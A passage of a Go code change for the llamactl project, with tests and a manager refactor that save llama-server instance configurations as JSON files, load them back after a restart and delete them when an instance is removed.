|
t.Fatalf("Failed to unmarshal persisted data: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if persistedInstance["name"] != "test-instance" {
|
||||||
|
t.Errorf("Expected name 'test-instance', got %v", persistedInstance["name"])
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestPersistence_InstancePersistedOnUpdate(t *testing.T) {
|
||||||
|
tempDir := t.TempDir()
|
||||||
|
|
||||||
|
cfg := config.InstancesConfig{
|
||||||
|
PortRange: [2]int{8000, 9000},
|
||||||
|
InstancesDir: tempDir,
|
||||||
|
MaxInstances: 10,
|
||||||
|
}
|
||||||
|
manager := manager.NewInstanceManager(cfg)
|
||||||
|
|
||||||
|
// Create instance
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
```go
		LlamaServerOptions: llamacpp.LlamaServerOptions{
			Model: "/path/to/model.gguf",
			Port:  8080,
		},
	}
	_, err := manager.CreateInstance("test-instance", options)
	if err != nil {
		t.Fatalf("CreateInstance failed: %v", err)
	}

	// Update instance
	newOptions := &instance.CreateInstanceOptions{
		LlamaServerOptions: llamacpp.LlamaServerOptions{
			Model: "/path/to/new-model.gguf",
			Port:  8081,
		},
	}
	_, err = manager.UpdateInstance("test-instance", newOptions)
	if err != nil {
		t.Fatalf("UpdateInstance failed: %v", err)
	}

	// Verify persistence file was updated
	expectedPath := filepath.Join(tempDir, "test-instance.json")
	data, err := os.ReadFile(expectedPath)
	if err != nil {
		t.Fatalf("Failed to read persistence file: %v", err)
	}

	var persistedInstance map[string]interface{}
	if err := json.Unmarshal(data, &persistedInstance); err != nil {
		t.Fatalf("Failed to unmarshal persisted data: %v", err)
	}

	// Check that the options were updated
	options_data, ok := persistedInstance["options"].(map[string]interface{})
	if !ok {
		t.Fatal("Expected options to be present in persisted data")
	}

	if options_data["model"] != "/path/to/new-model.gguf" {
		t.Errorf("Expected updated model '/path/to/new-model.gguf', got %v", options_data["model"])
	}
}

func TestPersistence_InstanceFileDeletedOnDeletion(t *testing.T) {
	tempDir := t.TempDir()

	cfg := config.InstancesConfig{
		PortRange:    [2]int{8000, 9000},
		InstancesDir: tempDir,
		MaxInstances: 10,
	}
	manager := manager.NewInstanceManager(cfg)

	// Create instance
	options := &instance.CreateInstanceOptions{
		LlamaServerOptions: llamacpp.LlamaServerOptions{
			Model: "/path/to/model.gguf",
		},
	}
	_, err := manager.CreateInstance("test-instance", options)
	if err != nil {
		t.Fatalf("CreateInstance failed: %v", err)
	}

	expectedPath := filepath.Join(tempDir, "test-instance.json")

	// Verify file exists
	if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
		t.Fatal("Expected persistence file to exist before deletion")
	}

	// Delete instance
	err = manager.DeleteInstance("test-instance")
	if err != nil {
		t.Fatalf("DeleteInstance failed: %v", err)
	}

	// Verify file was deleted
	if _, err := os.Stat(expectedPath); !os.IsNotExist(err) {
		t.Error("Expected persistence file to be deleted")
	}
}

func TestPersistence_InstancesLoadedFromDisk(t *testing.T) {
	tempDir := t.TempDir()

	// Create JSON files manually (simulating previous run)
	instance1JSON := `{
		"name": "instance1",
		"running": false,
		"options": {
			"model": "/path/to/model1.gguf",
			"port": 8080
		}
	}`

	instance2JSON := `{
		"name": "instance2",
		"running": false,
		"options": {
			"model": "/path/to/model2.gguf",
			"port": 8081
		}
	}`

	// Write JSON files
	err := os.WriteFile(filepath.Join(tempDir, "instance1.json"), []byte(instance1JSON), 0644)
	if err != nil {
		t.Fatalf("Failed to write test JSON file: %v", err)
	}

	err = os.WriteFile(filepath.Join(tempDir, "instance2.json"), []byte(instance2JSON), 0644)
	if err != nil {
		t.Fatalf("Failed to write test JSON file: %v", err)
	}

	// Create manager - should load instances from disk
	cfg := config.InstancesConfig{
		PortRange:    [2]int{8000, 9000},
		InstancesDir: tempDir,
		MaxInstances: 10,
	}
	manager := manager.NewInstanceManager(cfg)

	// Verify instances were loaded
	instances, err := manager.ListInstances()
	if err != nil {
		t.Fatalf("ListInstances failed: %v", err)
	}

	if len(instances) != 2 {
		t.Fatalf("Expected 2 loaded instances, got %d", len(instances))
	}

	// Check instances by name
	instancesByName := make(map[string]*instance.Process)
	for _, inst := range instances {
		instancesByName[inst.Name] = inst
	}

	instance1, exists := instancesByName["instance1"]
	if !exists {
		t.Error("Expected instance1 to be loaded")
	} else {
		if instance1.GetOptions().Model != "/path/to/model1.gguf" {
			t.Errorf("Expected model '/path/to/model1.gguf', got %q", instance1.GetOptions().Model)
		}
		if instance1.GetOptions().Port != 8080 {
			t.Errorf("Expected port 8080, got %d", instance1.GetOptions().Port)
		}
	}

	instance2, exists := instancesByName["instance2"]
	if !exists {
		t.Error("Expected instance2 to be loaded")
	} else {
		if instance2.GetOptions().Model != "/path/to/model2.gguf" {
			t.Errorf("Expected model '/path/to/model2.gguf', got %q", instance2.GetOptions().Model)
		}
		if instance2.GetOptions().Port != 8081 {
			t.Errorf("Expected port 8081, got %d", instance2.GetOptions().Port)
		}
	}
}

func TestPersistence_PortMapPopulatedFromLoadedInstances(t *testing.T) {
	tempDir := t.TempDir()

	// Create JSON file with specific port
	instanceJSON := `{
		"name": "test-instance",
		"running": false,
		"options": {
			"model": "/path/to/model.gguf",
			"port": 8080
		}
	}`

	err := os.WriteFile(filepath.Join(tempDir, "test-instance.json"), []byte(instanceJSON), 0644)
	if err != nil {
		t.Fatalf("Failed to write test JSON file: %v", err)
	}

	// Create manager - should load instance and register port
	cfg := config.InstancesConfig{
		PortRange:    [2]int{8000, 9000},
		InstancesDir: tempDir,
		MaxInstances: 10,
	}
	manager := manager.NewInstanceManager(cfg)

	// Try to create new instance with same port - should fail due to conflict
	options := &instance.CreateInstanceOptions{
		LlamaServerOptions: llamacpp.LlamaServerOptions{
			Model: "/path/to/model2.gguf",
			Port:  8080, // Same port as loaded instance
		},
	}

	_, err = manager.CreateInstance("new-instance", options)
	if err == nil {
		// Fatal rather than Error: err is dereferenced below.
		t.Fatal("Expected error for port conflict with loaded instance")
	}
	if !strings.Contains(err.Error(), "port") || !strings.Contains(err.Error(), "in use") {
		t.Errorf("Expected port conflict error, got: %v", err)
	}
}

func TestPersistence_CompleteInstanceDataRoundTrip(t *testing.T) {
	tempDir := t.TempDir()

	cfg := config.InstancesConfig{
		PortRange:           [2]int{8000, 9000},
		InstancesDir:        tempDir,
		MaxInstances:        10,
		DefaultAutoRestart:  true,
		DefaultMaxRestarts:  3,
		DefaultRestartDelay: 5,
	}

	// Create first manager and instance with comprehensive options
	manager1 := manager.NewInstanceManager(cfg)

	autoRestart := false
	maxRestarts := 10
	restartDelay := 30

	originalOptions := &instance.CreateInstanceOptions{
		AutoRestart:  &autoRestart,
		MaxRestarts:  &maxRestarts,
		RestartDelay: &restartDelay,
		LlamaServerOptions: llamacpp.LlamaServerOptions{
			Model:       "/path/to/model.gguf",
			Port:        8080,
			Host:        "localhost",
			CtxSize:     4096,
			GPULayers:   32,
			Temperature: 0.7,
			TopK:        40,
			TopP:        0.9,
			Verbose:     true,
			FlashAttn:   false,
			Lora:        []string{"adapter1.bin", "adapter2.bin"},
			HFRepo:      "microsoft/DialoGPT-medium",
		},
	}

	originalInstance, err := manager1.CreateInstance("roundtrip-test", originalOptions)
	if err != nil {
		t.Fatalf("CreateInstance failed: %v", err)
	}

	// Create second manager (simulating restart) - should load the instance
	manager2 := manager.NewInstanceManager(cfg)

	loadedInstance, err := manager2.GetInstance("roundtrip-test")
	if err != nil {
		t.Fatalf("GetInstance failed after reload: %v", err)
	}

	// Compare all data
	if loadedInstance.Name != originalInstance.Name {
		t.Errorf("Name mismatch: original=%q, loaded=%q", originalInstance.Name, loadedInstance.Name)
	}

	originalOpts := originalInstance.GetOptions()
	loadedOpts := loadedInstance.GetOptions()

	// Compare restart options
	if *loadedOpts.AutoRestart != *originalOpts.AutoRestart {
		t.Errorf("AutoRestart mismatch: original=%v, loaded=%v", *originalOpts.AutoRestart, *loadedOpts.AutoRestart)
	}
	if *loadedOpts.MaxRestarts != *originalOpts.MaxRestarts {
		t.Errorf("MaxRestarts mismatch: original=%v, loaded=%v", *originalOpts.MaxRestarts, *loadedOpts.MaxRestarts)
	}
	if *loadedOpts.RestartDelay != *originalOpts.RestartDelay {
		t.Errorf("RestartDelay mismatch: original=%v, loaded=%v", *originalOpts.RestartDelay, *loadedOpts.RestartDelay)
	}

	// Compare llama server options
	if loadedOpts.Model != originalOpts.Model {
		t.Errorf("Model mismatch: original=%q, loaded=%q", originalOpts.Model, loadedOpts.Model)
	}
	if loadedOpts.Port != originalOpts.Port {
		t.Errorf("Port mismatch: original=%d, loaded=%d", originalOpts.Port, loadedOpts.Port)
	}
	if loadedOpts.Host != originalOpts.Host {
		t.Errorf("Host mismatch: original=%q, loaded=%q", originalOpts.Host, loadedOpts.Host)
	}
	if loadedOpts.CtxSize != originalOpts.CtxSize {
		t.Errorf("CtxSize mismatch: original=%d, loaded=%d", originalOpts.CtxSize, loadedOpts.CtxSize)
	}
	if loadedOpts.GPULayers != originalOpts.GPULayers {
		t.Errorf("GPULayers mismatch: original=%d, loaded=%d", originalOpts.GPULayers, loadedOpts.GPULayers)
	}
	if loadedOpts.Temperature != originalOpts.Temperature {
		t.Errorf("Temperature mismatch: original=%f, loaded=%f", originalOpts.Temperature, loadedOpts.Temperature)
	}
	if loadedOpts.TopK != originalOpts.TopK {
		t.Errorf("TopK mismatch: original=%d, loaded=%d", originalOpts.TopK, loadedOpts.TopK)
	}
	if loadedOpts.TopP != originalOpts.TopP {
		t.Errorf("TopP mismatch: original=%f, loaded=%f", originalOpts.TopP, loadedOpts.TopP)
	}
	if loadedOpts.Verbose != originalOpts.Verbose {
		t.Errorf("Verbose mismatch: original=%v, loaded=%v", originalOpts.Verbose, loadedOpts.Verbose)
	}
	if loadedOpts.FlashAttn != originalOpts.FlashAttn {
		t.Errorf("FlashAttn mismatch: original=%v, loaded=%v", originalOpts.FlashAttn, loadedOpts.FlashAttn)
	}
	if loadedOpts.HFRepo != originalOpts.HFRepo {
		t.Errorf("HFRepo mismatch: original=%q, loaded=%q", originalOpts.HFRepo, loadedOpts.HFRepo)
	}

	// Compare slice fields
	if !reflect.DeepEqual(loadedOpts.Lora, originalOpts.Lora) {
		t.Errorf("Lora mismatch: original=%v, loaded=%v", originalOpts.Lora, loadedOpts.Lora)
	}

	// Verify created timestamp is preserved
	if loadedInstance.Created != originalInstance.Created {
		t.Errorf("Created timestamp mismatch: original=%d, loaded=%d", originalInstance.Created, loadedInstance.Created)
	}
}

// Helper function to create a test manager with standard config
func createTestManager() manager.InstanceManager {
	cfg := config.InstancesConfig{
		PortRange:           [2]int{8000, 9000},
		LogsDir:             "/tmp/test",
		MaxInstances:        10,
		LlamaExecutable:     "llama-server",
		DefaultAutoRestart:  true,
		DefaultMaxRestarts:  3,
		DefaultRestartDelay: 5,
	}
	return manager.NewInstanceManager(cfg)
}
```
```diff
@@ -1,54 +1,28 @@
-package llamactl
+package manager

 import (
 	"fmt"
-	"sync"
+	"llamactl/pkg/instance"
+	"llamactl/pkg/validation"
+	"os"
+	"path/filepath"
 )

-// InstanceManager defines the interface for managing instances of the llama server.
-type InstanceManager interface {
-	ListInstances() ([]*Instance, error)
-	CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
-	GetInstance(name string) (*Instance, error)
-	UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
-	DeleteInstance(name string) error
-	StartInstance(name string) (*Instance, error)
-	StopInstance(name string) (*Instance, error)
-	RestartInstance(name string) (*Instance, error)
-	GetInstanceLogs(name string) (string, error)
-}
-
-type instanceManager struct {
-	mu              sync.RWMutex
-	instances       map[string]*Instance
-	ports           map[int]bool
-	instancesConfig InstancesConfig
-}
-
-// NewInstanceManager creates a new instance of InstanceManager.
-func NewInstanceManager(instancesConfig InstancesConfig) InstanceManager {
-	return &instanceManager{
-		instances:       make(map[string]*Instance),
-		ports:           make(map[int]bool),
-		instancesConfig: instancesConfig,
-	}
-}
-
 // ListInstances returns a list of all instances managed by the instance manager.
-func (im *instanceManager) ListInstances() ([]*Instance, error) {
+func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
 	im.mu.RLock()
 	defer im.mu.RUnlock()

-	instances := make([]*Instance, 0, len(im.instances))
-	for _, instance := range im.instances {
-		instances = append(instances, instance)
+	instances := make([]*instance.Process, 0, len(im.instances))
+	for _, inst := range im.instances {
+		instances = append(instances, inst)
 	}
 	return instances, nil
 }

 // CreateInstance creates a new instance with the given options and returns it.
 // The instance is initially in a "stopped" state.
-func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
+func (im *instanceManager) CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
 	if options == nil {
 		return nil, fmt.Errorf("instance options cannot be nil")
 	}
@@ -57,12 +31,12 @@ func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOp
 		return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
 	}

-	err := ValidateInstanceName(name)
+	name, err := validation.ValidateInstanceName(name)
 	if err != nil {
 		return nil, err
 	}

-	err = ValidateInstanceOptions(options)
+	err = validation.ValidateInstanceOptions(options)
 	if err != nil {
 		return nil, err
 	}
@@ -90,15 +64,19 @@ func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOp
 		im.ports[options.Port] = true
 	}

-	instance := NewInstance(name, &im.instancesConfig, options)
-	im.instances[instance.Name] = instance
+	inst := instance.NewInstance(name, &im.instancesConfig, options)
+	im.instances[inst.Name] = inst
 	im.ports[options.Port] = true

-	return instance, nil
+	if err := im.persistInstance(inst); err != nil {
+		return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
+	}
+
+	return inst, nil
 }

 // GetInstance retrieves an instance by its name.
-func (im *instanceManager) GetInstance(name string) (*Instance, error) {
+func (im *instanceManager) GetInstance(name string) (*instance.Process, error) {
 	im.mu.RLock()
 	defer im.mu.RUnlock()

@@ -111,7 +89,7 @@ func (im *instanceManager) GetInstance(name string) (*Instance, error) {

 // UpdateInstance updates the options of an existing instance and returns it.
 // If the instance is running, it will be restarted to apply the new options.
-func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
+func (im *instanceManager) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
 	im.mu.RLock()
 	instance, exists := im.instances[name]
 	im.mu.RUnlock()
@@ -124,7 +102,7 @@ func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOp
 		return nil, fmt.Errorf("instance options cannot be nil")
 	}

-	err := ValidateInstanceOptions(options)
+	err := validation.ValidateInstanceOptions(options)
 	if err != nil {
 		return nil, err
 	}
@@ -149,6 +127,12 @@ func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOp
 		}
 	}

+	im.mu.Lock()
+	defer im.mu.Unlock()
+	if err := im.persistInstance(instance); err != nil {
+		return nil, fmt.Errorf("failed to persist updated instance %s: %w", name, err)
+	}
+
 	return instance, nil
 }

@@ -157,23 +141,30 @@ func (im *instanceManager) DeleteInstance(name string) error {
 	im.mu.Lock()
 	defer im.mu.Unlock()

-	_, exists := im.instances[name]
+	instance, exists := im.instances[name]
 	if !exists {
 		return fmt.Errorf("instance with name %s not found", name)
 	}

-	if im.instances[name].Running {
+	if instance.Running {
 		return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
 	}

-	delete(im.ports, im.instances[name].options.Port)
+	delete(im.ports, instance.GetOptions().Port)
 	delete(im.instances, name)

+	// Delete the instance's config file if persistence is enabled
+	instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
+	if err := os.Remove(instancePath); err != nil && !os.IsNotExist(err) {
+		return fmt.Errorf("failed to delete config file for instance %s: %w", instance.Name, err)
+	}
+
 	return nil
 }

 // StartInstance starts a stopped instance and returns it.
 // If the instance is already running, it returns an error.
-func (im *instanceManager) StartInstance(name string) (*Instance, error) {
+func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
 	im.mu.RLock()
 	instance, exists := im.instances[name]
 	im.mu.RUnlock()
@@ -189,11 +180,18 @@ func (im *instanceManager) StartInstance(name string) (*Instance, error) {
 		return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
 	}

+	im.mu.Lock()
+	defer im.mu.Unlock()
+	err := im.persistInstance(instance)
+	if err != nil {
+		return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
+	}
+
 	return instance, nil
 }

 // StopInstance stops a running instance and returns it.
-func (im *instanceManager) StopInstance(name string) (*Instance, error) {
+func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
 	im.mu.RLock()
 	instance, exists := im.instances[name]
 	im.mu.RUnlock()
@@ -209,11 +207,18 @@ func (im *instanceManager) StopInstance(name string) (*Instance, error) {
 		return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
 	}

+	im.mu.Lock()
+	defer im.mu.Unlock()
+	err := im.persistInstance(instance)
+	if err != nil {
+		return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
+	}
+
 	return instance, nil
 }

 // RestartInstance stops and then starts an instance, returning the updated instance.
-func (im *instanceManager) RestartInstance(name string) (*Instance, error) {
+func (im *instanceManager) RestartInstance(name string) (*instance.Process, error) {
 	instance, err := im.StopInstance(name)
 	if err != nil {
 		return nil, err
@@ -234,16 +239,3 @@ func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
 	// TODO: Implement actual log retrieval logic
 	return fmt.Sprintf("Logs for instance %s", name), nil
 }
-
-func (im *instanceManager) getNextAvailablePort() (int, error) {
-	portRange := im.instancesConfig.PortRange
-
-	for port := portRange[0]; port <= portRange[1]; port++ {
-		if !im.ports[port] {
-			im.ports[port] = true
-			return port, nil
-		}
-	}
-
-	return 0, fmt.Errorf("no available ports in the specified range")
-}
```
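The hunks above call `im.persistInstance`, which is defined elsewhere in this commit range and does not appear in the diff. A minimal sketch of what such a helper could look like, assuming the file layout the persistence tests read back (the body below is an illustration, not the project's actual code):

```go
// Hypothetical sketch of the persistInstance helper referenced in the hunks
// above; it is not shown in this diff. It serializes the instance to
// <InstancesDir>/<name>.json, the path the persistence tests check.
func (im *instanceManager) persistInstance(inst *instance.Process) error {
	if im.instancesConfig.InstancesDir == "" {
		return nil // persistence disabled
	}
	path := filepath.Join(im.instancesConfig.InstancesDir, inst.Name+".json")
	data, err := json.MarshalIndent(inst, "", "  ")
	if err != nil {
		return fmt.Errorf("failed to marshal instance %s: %w", inst.Name, err)
	}
	// 0644 matches the permissions used by the test fixtures.
	return os.WriteFile(path, data, 0644)
}
```

A helper along these lines would also need `encoding/json` in the import block alongside `os` and `path/filepath`.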
```diff
@@ -1,501 +0,0 @@
-package llamactl_test
-
-import (
-	"strings"
-	"testing"
-
-	llamactl "llamactl/pkg"
-)
-
-func TestNewInstanceManager(t *testing.T) {
-	config := llamactl.InstancesConfig{
-		PortRange:           [2]int{8000, 9000},
-		LogDirectory:        "/tmp/test",
-		MaxInstances:        5,
-		LlamaExecutable:     "llama-server",
-		DefaultAutoRestart:  true,
-		DefaultMaxRestarts:  3,
-		DefaultRestartDelay: 5,
-	}
-
-	manager := llamactl.NewInstanceManager(config)
-	if manager == nil {
-		t.Fatal("NewInstanceManager returned nil")
-	}
-
-	// Test initial state
-	instances, err := manager.ListInstances()
-	if err != nil {
-		t.Fatalf("ListInstances failed: %v", err)
-	}
-	if len(instances) != 0 {
-		t.Errorf("Expected empty instance list, got %d instances", len(instances))
-	}
-}
-
-func TestCreateInstance_Success(t *testing.T) {
-	manager := createTestManager()
-
-	options := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-			Port:  8080,
-		},
-	}
-
-	instance, err := manager.CreateInstance("test-instance", options)
-	if err != nil {
-		t.Fatalf("CreateInstance failed: %v", err)
-	}
-
-	if instance.Name != "test-instance" {
-		t.Errorf("Expected instance name 'test-instance', got %q", instance.Name)
-	}
-	if instance.Running {
-		t.Error("New instance should not be running")
-	}
-	if instance.GetOptions().Port != 8080 {
-		t.Errorf("Expected port 8080, got %d", instance.GetOptions().Port)
-	}
-}
-
-func TestCreateInstance_DuplicateName(t *testing.T) {
-	manager := createTestManager()
-
-	options1 := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	options2 := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	// Create first instance
-	_, err := manager.CreateInstance("test-instance", options1)
-	if err != nil {
-		t.Fatalf("First CreateInstance failed: %v", err)
-	}
-
-	// Try to create duplicate
-	_, err = manager.CreateInstance("test-instance", options2)
-	if err == nil {
-		t.Error("Expected error for duplicate instance name")
-	}
-	if !strings.Contains(err.Error(), "already exists") {
-		t.Errorf("Expected duplicate name error, got: %v", err)
-	}
-}
-
-func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
-	// Create manager with low max instances limit
-	config := llamactl.InstancesConfig{
-		PortRange:    [2]int{8000, 9000},
-		MaxInstances: 2, // Very low limit for testing
-	}
-	manager := llamactl.NewInstanceManager(config)
-
-	options1 := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	options2 := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	options3 := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	// Create instances up to the limit
-	_, err := manager.CreateInstance("instance1", options1)
-	if err != nil {
-		t.Fatalf("CreateInstance 1 failed: %v", err)
-	}
-
-	_, err = manager.CreateInstance("instance2", options2)
-	if err != nil {
-		t.Fatalf("CreateInstance 2 failed: %v", err)
-	}
-
-	// This should fail due to max instances limit
-	_, err = manager.CreateInstance("instance3", options3)
-	if err == nil {
-		t.Error("Expected error when exceeding max instances limit")
-	}
-	if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
-		t.Errorf("Expected max instances error, got: %v", err)
-	}
-}
-
-func TestCreateInstance_PortAssignment(t *testing.T) {
-	manager := createTestManager()
-
-	// Create instance without specifying port
-	options := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	instance, err := manager.CreateInstance("test-instance", options)
-	if err != nil {
-		t.Fatalf("CreateInstance failed: %v", err)
-	}
-
-	// Should auto-assign a port in the range
-	port := instance.GetOptions().Port
-	if port < 8000 || port > 9000 {
-		t.Errorf("Expected port in range 8000-9000, got %d", port)
-	}
-}
-
-func TestCreateInstance_PortConflictDetection(t *testing.T) {
-	manager := createTestManager()
-
-	options1 := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-			Port:  8080, // Explicit port
-		},
-	}
-
-	options2 := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model2.gguf",
-			Port:  8080, // Same port - should conflict
-		},
-	}
-
-	// Create first instance
-	_, err := manager.CreateInstance("instance1", options1)
-	if err != nil {
-		t.Fatalf("CreateInstance 1 failed: %v", err)
-	}
-
-	// Try to create second instance with same port
-	_, err = manager.CreateInstance("instance2", options2)
-	if err == nil {
-		t.Error("Expected error for port conflict")
-	}
-	if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
-		t.Errorf("Expected port conflict error, got: %v", err)
-	}
-}
-
-func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
-	manager := createTestManager()
-
-	options1 := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	options2 := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	// Create multiple instances and verify they get different ports
-	instance1, err := manager.CreateInstance("instance1", options1)
-	if err != nil {
-		t.Fatalf("CreateInstance 1 failed: %v", err)
-	}
-
-	instance2, err := manager.CreateInstance("instance2", options2)
-	if err != nil {
-		t.Fatalf("CreateInstance 2 failed: %v", err)
-	}
-
-	port1 := instance1.GetOptions().Port
-	port2 := instance2.GetOptions().Port
-
-	if port1 == port2 {
-		t.Errorf("Expected different ports, both got %d", port1)
-	}
-}
-
-func TestCreateInstance_PortExhaustion(t *testing.T) {
-	// Create manager with very small port range
-	config := llamactl.InstancesConfig{
-		PortRange:    [2]int{8000, 8001}, // Only 2 ports available
-		MaxInstances: 10,                 // Higher than available ports
-	}
-	manager := llamactl.NewInstanceManager(config)
-
-	options1 := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	options2 := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	options3 := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	// Create instances to exhaust all ports
-	_, err := manager.CreateInstance("instance1", options1)
-	if err != nil {
-		t.Fatalf("CreateInstance 1 failed: %v", err)
-	}
-
-	_, err = manager.CreateInstance("instance2", options2)
-	if err != nil {
-		t.Fatalf("CreateInstance 2 failed: %v", err)
-	}
-
-	// This should fail due to port exhaustion
-	_, err = manager.CreateInstance("instance3", options3)
-	if err == nil {
-		t.Error("Expected error when ports are exhausted")
-	}
-	if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
-		t.Errorf("Expected port exhaustion error, got: %v", err)
-	}
-}
-
-func TestDeleteInstance_PortRelease(t *testing.T) {
-	manager := createTestManager()
-
-	options := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-			Port:  8080,
-		},
-	}
-
-	// Create instance with specific port
-	_, err := manager.CreateInstance("test-instance", options)
-	if err != nil {
-		t.Fatalf("CreateInstance failed: %v", err)
-	}
-
-	// Delete the instance
-	err = manager.DeleteInstance("test-instance")
-	if err != nil {
-		t.Fatalf("DeleteInstance failed: %v", err)
-	}
-
-	// Should be able to create new instance with same port
-	_, err = manager.CreateInstance("new-instance", options)
-	if err != nil {
-		t.Errorf("Expected to reuse port after deletion, got error: %v", err)
-	}
-}
-
-func TestGetInstance_Success(t *testing.T) {
-	manager := createTestManager()
-
-	// Create an instance first
-	options := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-	created, err := manager.CreateInstance("test-instance", options)
-	if err != nil {
-		t.Fatalf("CreateInstance failed: %v", err)
-	}
-
-	// Retrieve it
-	retrieved, err := manager.GetInstance("test-instance")
-	if err != nil {
-		t.Fatalf("GetInstance failed: %v", err)
-	}
-
-	if retrieved.Name != created.Name {
-		t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
-	}
-}
-
-func TestGetInstance_NotFound(t *testing.T) {
-	manager := createTestManager()
-
-	_, err := manager.GetInstance("nonexistent")
-	if err == nil {
-		t.Error("Expected error for nonexistent instance")
-	}
-	if !strings.Contains(err.Error(), "not found") {
-		t.Errorf("Expected 'not found' error, got: %v", err)
-	}
-}
-
-func TestListInstances(t *testing.T) {
-	manager := createTestManager()
-
-	// Initially empty
-	instances, err := manager.ListInstances()
-	if err != nil {
-		t.Fatalf("ListInstances failed: %v", err)
-	}
-	if len(instances) != 0 {
-		t.Errorf("Expected 0 instances, got %d", len(instances))
-	}
-
-	// Create some instances
-	options1 := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	options2 := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	_, err = manager.CreateInstance("instance1", options1)
-	if err != nil {
-		t.Fatalf("CreateInstance 1 failed: %v", err)
-	}
-
-	_, err = manager.CreateInstance("instance2", options2)
-	if err != nil {
-		t.Fatalf("CreateInstance 2 failed: %v", err)
-	}
-
-	// List should return both
-	instances, err = manager.ListInstances()
-	if err != nil {
-		t.Fatalf("ListInstances failed: %v", err)
-	}
-	if len(instances) != 2 {
-		t.Errorf("Expected 2 instances, got %d", len(instances))
-	}
-
-	// Check names are present
-	names := make(map[string]bool)
-	for _, instance := range instances {
-		names[instance.Name] = true
-	}
-	if !names["instance1"] || !names["instance2"] {
-		t.Error("Expected both instance1 and instance2 in list")
-	}
-}
-
-func TestDeleteInstance_Success(t *testing.T) {
-	manager := createTestManager()
-
-	// Create an instance
-	options := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-	_, err := manager.CreateInstance("test-instance", options)
-	if err != nil {
-		t.Fatalf("CreateInstance failed: %v", err)
-	}
-
-	// Delete it
-	err = manager.DeleteInstance("test-instance")
-	if err != nil {
-		t.Fatalf("DeleteInstance failed: %v", err)
-	}
-
-	// Should no longer exist
-	_, err = manager.GetInstance("test-instance")
-	if err == nil {
-		t.Error("Instance should not exist after deletion")
-	}
-}
-
-func TestDeleteInstance_NotFound(t *testing.T) {
